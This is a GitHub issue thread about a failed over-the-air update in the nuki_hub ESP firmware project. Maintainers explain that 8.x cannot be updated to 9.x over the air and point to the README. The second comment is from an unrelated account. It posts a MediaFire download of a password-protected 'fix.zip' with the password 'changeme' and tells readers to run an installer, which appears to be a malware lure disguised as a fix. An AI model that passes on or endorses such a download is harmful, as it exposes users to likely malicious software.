### ISSUE TITLE
Updating from 8.33 error when download from ESP ota interface

### ISSUE THREAD

**Issue by chrispazz** [technyon/nuki_hub#467]
When trying to update from 8.33 to latest version using builtin ota updater, clicking on "Download latest" return page not found:

https://github.com/technyon/nuki_hub/raw/master/webflash/nuki_hub.bin

Thank you

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by technyon** [comment]
Version 8.x can't be updated to 9.x can't be updated via OTA, you'll have to flash via serial.

**Comment by iranl** [comment]
There is a mandatory issue template for a reason as this is mentioned in the [README](https://github.com/technyon/nuki_hub?tab=readme-ov-file#upgrading-using-over-the-air-update-ota)
